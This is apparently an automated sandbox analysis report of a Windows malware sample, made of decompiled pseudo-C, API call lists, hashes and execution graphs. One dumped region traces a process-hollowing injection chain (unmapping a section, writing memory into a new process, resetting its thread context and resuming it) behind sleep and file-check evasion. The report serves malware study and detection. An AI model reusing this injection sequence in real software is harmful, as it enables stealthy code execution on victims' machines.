                      					_t27 =  *0x418e18; // 0x418d40
                      					 *((intOrPtr*)(_t30 - 0x1c)) = E0040F05D(_t8, _t27);
                      					 *(_t30 - 4) = 0xfffffffe;
                      					E0040F105();
                      				} else {
                      					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
                      					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
                      						goto L6;
                      					} else {
                      						_t29 =  *((intOrPtr*)(E0040BD70(_t22, __edx, _t33) + 0x6c));
                      					}
                      				}
                      				if(_t29 == 0) {
                      					E00406BE8(0x20);
                      				}
                      				return E004081AD(_t29);
                      			}








                      0x0040f09b
                      0x0040f09b
                      0x0040f09b
                      0x0040f09b
                      0x0040f09b
                      0x0040f09d
                      0x0040f0a2
                      0x0040f0ac
                      0x0040f0ae
                      0x0040f0b6
                      0x0040f0da
                      0x0040f0dc
                      0x0040f0e2
                      0x0040f0e6
                      0x0040f0e9
                      0x0040f0f4
                      0x0040f0f7
                      0x0040f0fe
                      0x0040f0b8
                      0x0040f0b8
                      0x0040f0bc
                      0x00000000
                      0x0040f0be
                      0x0040f0c3
                      0x0040f0c3
                      0x0040f0bc
                      0x0040f0c8
                      0x0040f0cc
                      0x0040f0d1
                      0x0040f0d9

                      APIs
                      • __getptd.LIBCMT ref: 0040F0A7
                        • Part of subcall function 0040BD70: __getptd_noexit.LIBCMT ref: 0040BD73
                        • Part of subcall function 0040BD70: __amsg_exit.LIBCMT ref: 0040BD80
                      • __getptd.LIBCMT ref: 0040F0BE
                      • __amsg_exit.LIBCMT ref: 0040F0CC
                      • __lock.LIBCMT ref: 0040F0DC
                      Memory Dump Source
                      • Source File: 00000000.00000002.304961274.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.304953062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305007743.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305016112.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305025625.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305042313.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305046967.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                      • String ID:
                      • API String ID: 3521780317-0
                      • Opcode ID: 8ca7ef0c350fca566ba6684c216ff16df0ed23dafa0c33d837cdfb98a3a2b658
                      • Instruction ID: 925462649c196d7ab1147969d9d15b3965408171c252b3ccfbaa8ed3a22b351d
                      • Opcode Fuzzy Hash: 8ca7ef0c350fca566ba6684c216ff16df0ed23dafa0c33d837cdfb98a3a2b658
                      • Instruction Fuzzy Hash: FAF06D32A44B14CAD730BB65D802B8A73A0AF00764F10413FA841BB6D2DB7CAC45CA9E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 88%
                      			E0041614E(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
                      				intOrPtr _t17;
                      				intOrPtr* _t28;
                      				void* _t29;
                      
                      				_t30 = __eflags;
                      				_t28 = __esi;
                      				_t26 = __edx;
                      				_t19 = __ebx;
                      				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
                      				E00415C16(__ebx, __edx, __edi, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
                      				 *((intOrPtr*)(E0040BD70(__ebx, __edx, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
                      				_t17 = E0040BD70(_t19, _t26, _t30);
                      				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
                      				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
                      					_t17 =  *((intOrPtr*)(__esi + 0x14));
                      					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
                      						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
                      							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
                      							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
                      								_t17 = E00415BEF(_t37,  *((intOrPtr*)(_t28 + 0x18)));
                      								_t38 = _t17;
                      								if(_t17 != 0) {
                      									_push( *((intOrPtr*)(_t29 + 0x10)));
                      									_push(_t28);
                      									return E00415EE6(_t38);
                      								}
                      							}
                      						}
                      					}
                      				}
                      				return _t17;
                      			}






                      0x0041614e
                      0x0041614e
                      0x0041614e
                      0x0041614e
                      0x00416151
                      0x00416157
                      0x00416165
                      0x0041616b
                      0x00416173
                      0x0041617f
                      0x00416187
                      0x0041618f
                      0x004161a3
                      0x004161a5
                      0x004161a9
                      0x004161ae
                      0x004161b4
                      0x004161b6
                      0x004161b8
                      0x004161bb
                      0x00000000
                      0x004161c2
                      0x004161b6
                      0x004161a9
                      0x004161a3
                      0x0041618f
                      0x004161c3

                      APIs
                        • Part of subcall function 00415C16: __getptd.LIBCMT ref: 00415C1C
                        • Part of subcall function 00415C16: __getptd.LIBCMT ref: 00415C2C
                      • __getptd.LIBCMT ref: 0041615D
                        • Part of subcall function 0040BD70: __getptd_noexit.LIBCMT ref: 0040BD73
                        • Part of subcall function 0040BD70: __amsg_exit.LIBCMT ref: 0040BD80
                      • __getptd.LIBCMT ref: 0041616B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.304961274.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.304953062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305007743.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305016112.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305025625.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305042313.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305046967.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: __getptd$__amsg_exit__getptd_noexit
                      • String ID: csm
                      • API String ID: 803148776-1018135373
                      • Opcode ID: a935c30cd55411eed2351ce7d8e9c1ad7b12a7df9e4901bfa9168f7baf4b6cfa
                      • Instruction ID: 474831be7a2f2d2468342213cfcbba1cf13fe85f3b37322c86b277925fab3e0f
                      • Opcode Fuzzy Hash: a935c30cd55411eed2351ce7d8e9c1ad7b12a7df9e4901bfa9168f7baf4b6cfa
                      • Instruction Fuzzy Hash: 54012834800705EECF389F25D440AEEB3B5EF50311F15442FE44156792DB38DAC5CA99
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Execution Graph

                      Execution Coverage:6.1%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:0%
                      Total number of Nodes:19
                      Total number of Limit Nodes:0
                      execution_graph 668 402ad1 669 402ad2 668->669 671 402b56 669->671 672 40180c 669->672 673 40181b 672->673 674 40183e Sleep 673->674 676 401859 674->676 675 40186a NtTerminateProcess 677 401876 675->677 676->675 677->671 682 401818 683 40181b 682->683 684 40183e Sleep 683->684 686 401859 684->686 685 40186a NtTerminateProcess 687 401876 685->687 686->685 688 402a9d 689 402ad2 688->689 690 40180c 2 API calls 689->690 691 402b56 689->691 690->691

                      Callgraph

                      • Executed
                      • Not Executed
                      • Opacity -> Relevance
                      • Disassembly available
                      callgraph 0 Function_00401246 1 Function_00401748 2 Function_00401BC9 3 Function_00402ACE 53 Function_0040180C 3->53 4 Function_004011D0 5 Function_00402AD1 5->53 6 Function_00401DD3 7 Function_00401AD5 8 Function_004011D7 9 Function_00402B58 10 Function_00402DD8 11 Function_00402E59 12 Function_004023DB 13 Function_00402E5C 14 Function_004027DC 15 Function_0040195D 16 Function_0040275E 17 Function_004010DF 18 Function_00402DE2 19 Function_00401064 20 Function_004016E4 21 Function_00402B66 22 Function_00401D66 23 Function_00402F6A 24 Function_0040136B 25 Function_004011EB 26 Function_00402D6E 27 Function_004025EF 28 Function_00402BEF 29 Function_00402E75 30 Function_00402D75 31 Function_00402575 32 Function_004015F5 33 Function_00402DF5 34 Function_00402CF7 35 Function_00402D79 36 Function_004017F9 37 Function_0040187A 38 Function_00402B7A 39 Function_0040157F 40 Function_00402E7F 41 Function_004013FF 42 Function_00401381 43 Function_00402102 44 Function_00401E82 45 Function_00402B82 46 Function_00402E83 47 Function_00401884 48 Function_00401705 49 Function_00402706 50 Function_00401786 51 Function_00401686 52 Function_0040188B 53->42 54 Function_0040138C 55 Function_00401A8C 56 Function_00402993 57 Function_00402E14 58 Function_00401894 59 Function_00402794 60 Function_00402E94 61 Function_00401715 62 Function_00401297 63 Function_00401818 63->42 64 Function_00401898 65 Function_00402E98 66 Function_0040131A 67 Function_0040259B 68 Function_00402A9D 68->53 69 Function_0040281D 70 Function_0040139D 71 Function_00402E20 72 Function_004013A0 73 Function_00401822 73->42 74 Function_00401826 74->42 75 Function_00401427 76 Function_0040212C 77 Function_00401D31 78 Function_00401D32 79 Function_00401CB2 80 Function_00402D33 80->4 81 Function_00401834 81->42 82 Function_00402635 83 Function_00402DB9 84 Function_00401D3D

                      Control-flow Graph

                      C-Code - Quality: 23%
                      			E0040180C(void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                      				char _v8;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* __ebp;
                      				void* _t11;
                      				void* _t16;
                      				intOrPtr* _t17;
                      				void* _t19;
                      				void* _t20;
                      				void* _t21;
                      
                      				_t22 = __eflags;
                      				L00401140(0x183e, _t16, _t20, _t21, __eflags, __fp0);
                      				_t17 = _a4;
                      				Sleep(0x1388);
                      				_t11 = E00401381(_t19, _t22, _t17, _a8, _a12,  &_v8); // executed
                      				if(_t11 != 0) {
                      					_push(_a16);
                      					_push(_v8);
                      					_push(_t11);
                      					_push(_t17); // executed
                      					L00401455(0x60, _t19, _t20); // executed
                      				}
                      				 *_t17(0xffffffff, 0); // executed
                      				_t17 = _t17 + 0x60;
                      				_push(0x60);
                      				asm("pushad");
                      				__ecx =  *__esp;
                      				__esp = __esp + 4;
                      				return __eax;
                      			}














                      0x0040180c
                      0x00401839
                      0x0040183e
                      0x00401846
                      0x00401854
                      0x0040185b
                      0x0040185d
                      0x00401860
                      0x00401863
                      0x00401864
                      0x00401865
                      0x00401865
                      0x0040186e
                      0x0040187a
                      0x0040188a
                      0x0040188b
                      0x0040188c
                      0x0040188f
                      0x004018a2

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 00401846
                      • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                      Memory Dump Source
                      • Source File: 00000001.00000002.389153577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_file.jbxd
                      Similarity
                      • API ID: ProcessSleepTerminate
                      • String ID:
                      • API String ID: 417527130-0
                      • Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                      • Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
                      • Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                      • Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 00401846
                      • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                      Memory Dump Source
                      • Source File: 00000001.00000002.389153577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_file.jbxd
                      Similarity
                      • API ID: ProcessSleepTerminate
                      • String ID:
                      • API String ID: 417527130-0
                      • Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                      • Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
                      • Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                      • Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 17%
                      			E00401822(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                      				void* _t11;
                      				intOrPtr* _t17;
                      				void* _t19;
                      				void* _t22;
                      
                      				_t23 = __eflags;
                      				asm("out 0x95, eax");
                      				L00401140(0x183e, __ebx, __edi, __esi, __eflags, __fp0);
                      				_t17 =  *((intOrPtr*)(_t22 + 8));
                      				Sleep(0x1388);
                      				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                      				if(_t11 != 0) {
                      					_push( *((intOrPtr*)(_t22 + 0x14)));
                      					_push( *((intOrPtr*)(_t22 - 4)));
                      					_push(_t11);
                      					_push(_t17); // executed
                      					L00401455(0x60, _t19, __edi); // executed
                      				}
                      				 *_t17(0xffffffff, 0); // executed
                      				_t17 = _t17 + 0x60;
                      				_push(0x60);
                      				asm("pushad");
                      				__ecx =  *__esp;
                      				__esp = __esp + 4;
                      				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                      				_pop(__edi);
                      				_pop(__esi);
                      				_pop(__ebx);
                      				__esp = __ebp;
                      				_pop(__ebp);
                      				return __eax;
                      			}







                      0x00401822
                      0x00401822
                      0x00401839
                      0x0040183e
                      0x00401846
                      0x00401854
                      0x0040185b
                      0x0040185d
                      0x00401860
                      0x00401863
                      0x00401864
                      0x00401865
                      0x00401865
                      0x0040186e
                      0x0040187a
                      0x0040188a
                      0x0040188b
                      0x0040188c
                      0x0040188f
                      0x00401899
                      0x0040189e
                      0x0040189f
                      0x004018a0
                      0x004018a1
                      0x004018a1
                      0x004018a2

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 00401846
                      • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                      Memory Dump Source
                      • Source File: 00000001.00000002.389153577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_file.jbxd
                      Similarity
                      • API ID: ProcessSleepTerminate
                      • String ID:
                      • API String ID: 417527130-0
                      • Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                      • Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
                      • Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                      • Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 17%
                      			E00401826(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                      				void* _t8;
                      				void* _t11;
                      				intOrPtr* _t17;
                      				void* _t19;
                      				void* _t22;
                      
                      				_t23 = __eflags;
                      				asm("sbb ebx, ebp");
                      				L00401140(_t8, __ebx, __edi, __esi, __eflags, __fp0);
                      				_t17 =  *((intOrPtr*)(_t22 + 8));
                      				Sleep(0x1388);
                      				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                      				if(_t11 != 0) {
                      					_push( *((intOrPtr*)(_t22 + 0x14)));
                      					_push( *((intOrPtr*)(_t22 - 4)));
                      					_push(_t11);
                      					_push(_t17); // executed
                      					L00401455(0x60, _t19, __edi); // executed
                      				}
                      				 *_t17(0xffffffff, 0); // executed
                      				_t17 = _t17 + 0x60;
                      				_push(0x60);
                      				asm("pushad");
                      				__ecx =  *__esp;
                      				__esp = __esp + 4;
                      				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                      				_pop(__edi);
                      				_pop(__esi);
                      				_pop(__ebx);
                      				__esp = __ebp;
                      				_pop(__ebp);
                      				return __eax;
                      			}








                      0x00401826
                      0x00401826
                      0x00401839
                      0x0040183e
                      0x00401846
                      0x00401854
                      0x0040185b
                      0x0040185d
                      0x00401860
                      0x00401863
                      0x00401864
                      0x00401865
                      0x00401865
                      0x0040186e
                      0x0040187a
                      0x0040188a
                      0x0040188b
                      0x0040188c
                      0x0040188f
                      0x00401899
                      0x0040189e
                      0x0040189f
                      0x004018a0
                      0x004018a1
                      0x004018a1
                      0x004018a2

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 00401846
                      • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                      Memory Dump Source
                      • Source File: 00000001.00000002.389153577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_file.jbxd
                      Similarity
                      • API ID: ProcessSleepTerminate
                      • String ID:
                      • API String ID: 417527130-0
                      • Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                      • Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
                      • Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                      • Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 20%
                      			E00401834(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                      				void* _t10;
                      				void* _t13;
                      				intOrPtr* _t19;
                      				void* _t22;
                      				void* _t25;
                      
                      				_t26 = __eflags;
                      				L00401140(_t10, __ebx, __edi, __esi, __eflags, __fp0);
                      				_t19 =  *((intOrPtr*)(_t25 + 8));
                      				Sleep(0x1388);
                      				_t13 = E00401381(_t22, _t26, _t19,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
                      				if(_t13 != 0) {
                      					_push( *((intOrPtr*)(_t25 + 0x14)));
                      					_push( *((intOrPtr*)(_t25 - 4)));
                      					_push(_t13);
                      					_push(_t19); // executed
                      					L00401455(0x60, _t22, __edi); // executed
                      				}
                      				 *_t19(0xffffffff, 0); // executed
                      				_t19 = _t19 + 0x60;
                      				_push(0x60);
                      				asm("pushad");
                      				__ecx =  *__esp;
                      				__esp = __esp + 4;
                      				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                      				_pop(__edi);
                      				_pop(__esi);
                      				_pop(__ebx);
                      				__esp = __ebp;
                      				_pop(__ebp);
                      				return __eax;
                      			}








                      0x00401834
                      0x00401839
                      0x0040183e
                      0x00401846
                      0x00401854
                      0x0040185b
                      0x0040185d
                      0x00401860
                      0x00401863
                      0x00401864
                      0x00401865
                      0x00401865
                      0x0040186e
                      0x0040187a
                      0x0040188a
                      0x0040188b
                      0x0040188c
                      0x0040188f
                      0x00401899
                      0x0040189e
                      0x0040189f
                      0x004018a0
                      0x004018a1
                      0x004018a1
                      0x004018a2

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 00401846
                      • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                      Memory Dump Source
                      • Source File: 00000001.00000002.389153577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_file.jbxd
                      Similarity
                      • API ID: ProcessSleepTerminate
                      • String ID:
                      • API String ID: 417527130-0
                      • Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                      • Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
                      • Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                      • Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Execution Graph

                      Execution Coverage:64.9%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:0%
                      Total number of Nodes:26
                      Total number of Limit Nodes:7
                      execution_graph 227 7e0000 230 7e0630 227->230 229 7e0005 231 7e064c 230->231 233 7e1577 231->233 236 7e05b0 233->236 239 7e05dc 236->239 237 7e061e 238 7e05e2 GetFileAttributesA 238->239 239->237 239->238 241 7e0420 239->241 242 7e04f3 241->242 243 7e04ff CreateWindowExA 242->243 244 7e04fa 242->244 243->244 245 7e0540 PostMessageA 243->245 244->239 246 7e055f 245->246 246->244 248 7e0110 VirtualAlloc GetModuleFileNameA 246->248 249 7e017d CreateProcessA 248->249 250 7e0414 248->250 249->250 252 7e025f VirtualFree VirtualAlloc GetThreadContext 249->252 250->246 252->250 253 7e02a9 ReadProcessMemory 252->253 254 7e02e5 VirtualAllocEx NtWriteVirtualMemory 253->254 255 7e02d5 NtUnmapViewOfSection 253->255 256 7e033b 254->256 255->254 257 7e039d WriteProcessMemory SetThreadContext ResumeThread 256->257 258 7e0350 NtWriteVirtualMemory 256->258 259 7e03fb ExitProcess 257->259 258->256

                      Callgraph

                      • Executed
                      • Not Executed
                      • Opacity -> Relevance
                      • Disassembly available
                      callgraph 0 Function_007E2EFE 1 Function_007E187F 2 Function_007E2F7C 3 Function_007E20FD 4 Function_007E34FA 5 Function_007E2B7B 6 Function_007E1977 7 Function_007E1577 36 Function_007E05B0 7->36 8 Function_007E2275 9 Function_007E2573 10 Function_007E1970 11 Function_007E33F1 12 Function_007E3571 13 Function_007E1EE8 14 Function_007E2369 15 Function_007E19E6 16 Function_007E1CE4 17 Function_007E3361 18 Function_007E24DD 19 Function_007E2DD5 20 Function_007E3355 21 Function_007E24D2 22 Function_007E2452 23 Function_007E24D1 24 Function_007E28CC 25 Function_007E0042 26 Function_007E00C3 25->26 27 Function_007E1B3F 28 Function_007E2FBD 29 Function_007E1ABA 30 Function_007E343A 31 Function_007E2D3B 32 Function_007E1A37 33 Function_007E2F34 34 Function_007E1EB5 35 Function_007E3133 47 Function_007E0420 36->47 37 Function_007E0630 37->7 56 Function_007E0010 37->56 38 Function_007E34B0 39 Function_007E222C 40 Function_007E1E26 41 Function_007E1F26 42 Function_007E2EA6 43 Function_007E33A4 44 Function_007E1EA5 45 Function_007E2622 46 Function_007E28A2 55 Function_007E0110 47->55 48 Function_007E1B9F 49 Function_007E1D1F 50 Function_007E349F 51 Function_007E341B 52 Function_007E1F99 53 Function_007E1D95 54 Function_007E2D15 56->25 57 Function_007E2D8F 58 Function_007E338A 59 Function_007E1B0B 60 Function_007E198B 61 Function_007E2506 62 Function_007E3487 63 Function_007E1804 64 Function_007E1E84 65 Function_007E0000 65->37 66 Function_007E1D01

                      Control-flow Graph

                      APIs
                      • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 007E0156
                      • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 007E016C
                      • CreateProcessA.KERNELBASE(?,00000000), ref: 007E0255
                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007E0270
                      • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 007E0283
                      • GetThreadContext.KERNELBASE(00000000,?), ref: 007E029F
                      • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 007E02C8
                      • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 007E02E3
                      • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 007E0304
                      • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 007E032A
                      • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 007E0399
                      • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 007E03BF
                      • SetThreadContext.KERNELBASE(00000000,?), ref: 007E03E1
                      • ResumeThread.KERNELBASE(00000000), ref: 007E03ED
                      • ExitProcess.KERNEL32(00000000), ref: 007E0412
                      Memory Dump Source
                      • Source File: 00000005.00000002.437589337.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7e0000_dubewge.jbxd
                      Similarity
                      • API ID: Virtual$MemoryProcess$AllocThreadWrite$Context$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                      • String ID:
                      • API String ID: 2875986403-0
                      • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                      • Instruction ID: e398f8f6477fb5cba087a7b86b73849ba62b796ce04be8555816b72e0720064a
                      • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                      • Instruction Fuzzy Hash: CDB1D874A00208AFDB44CF98C895F9EBBB5FF88314F248158E509AB391D775AD81CF94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 15 7e0420-7e04f8 17 7e04ff-7e053c CreateWindowExA 15->17 18 7e04fa 15->18 20 7e053e 17->20 21 7e0540-7e0558 PostMessageA 17->21 19 7e05aa-7e05ad 18->19 20->19 22 7e055f-7e0563 21->22 22->19 23 7e0565-7e0579 22->23 23->19 25 7e057b-7e0582 23->25 26 7e05a8 25->26 27 7e0584-7e0588 25->27 26->22 27->26 28 7e058a-7e0591 27->28 28->26 29 7e0593-7e0597 call 7e0110 28->29 31 7e059c-7e05a5 29->31 31->26
                      APIs
                      • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 007E0533
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.437589337.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7e0000_dubewge.jbxd
                      Similarity
                      • API ID: CreateWindow
                      • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                      • API String ID: 716092398-2341455598
                      • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                      • Instruction ID: 14b25694f6b6110baeeaa905ed67ab32b252e2595c48904b3f140fd109d71b67
                      • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                      • Instruction Fuzzy Hash: 50510770D083C8DAEB11CB98C849B9DBFB26F15708F144058D5446F286C3FA5A68CBA6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 32 7e05b0-7e05d5 33 7e05dc-7e05e0 32->33 34 7e061e-7e0621 33->34 35 7e05e2-7e05f5 GetFileAttributesA 33->35 36 7e05f7-7e05fe 35->36 37 7e0613-7e061c 35->37 36->37 38 7e0600-7e060b call 7e0420 36->38 37->33 40 7e0610 38->40 40->37
                      APIs
                      • GetFileAttributesA.KERNELBASE(apfHQ), ref: 007E05EC
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.437589337.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7e0000_dubewge.jbxd
                      Similarity
                      • API ID: AttributesFile
                      • String ID: apfHQ$o
                      • API String ID: 3188754299-2999369273
                      • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                      • Instruction ID: 1c84acb3969590ae05e6d8a1b8a196ca15a5418ee310e436c94cc90718fb4398
                      • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                      • Instruction Fuzzy Hash: C4012570C0528CEEDF11DB94C5187AEBFB59F45308F1480D9C4192B241D7BA9B98CBD1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Callgraph

                      • Executed
                      • Not Executed
                      • Opacity -> Relevance
                      • Disassembly available
